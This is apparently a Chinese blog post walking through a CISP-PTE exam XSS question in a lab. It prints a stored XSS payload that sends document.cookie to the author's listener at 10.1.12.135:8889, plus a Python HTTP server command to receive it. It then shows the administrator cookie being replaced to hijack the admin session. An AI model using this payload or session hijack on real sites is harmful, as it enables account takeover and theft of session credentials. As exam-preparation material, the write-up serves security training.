banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

cisp-pte xss考題

Xss 內容主要的考點是在獲取管理員的 cookie,然後偽造管理員的 cookie 進行登錄。

界面如下

img

點擊上圖中的 Test 可進行留言

img

準備獲取 cookie 的 xss payload

<script>
document.write('<img src="http://10.1.12.135:8889?'+ escape(document.cookie) + '">')
</script>

開啟 web 服務,接收 cookie

Python -m SimpleHTTPServer 8889

img

將 payload 寫入輸入框

img

點擊提交查詢

等待

查看 python 是否接收到 cookie

img

將 cookie 複製下來

1acb0fb952b3caaf1ab7277511923138

img

將 cookie 值替換掉

img

點擊 Edit 進行替換

img

刷新界面,點擊 Admin

img

成功登錄,獲取到 key

wps10

載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。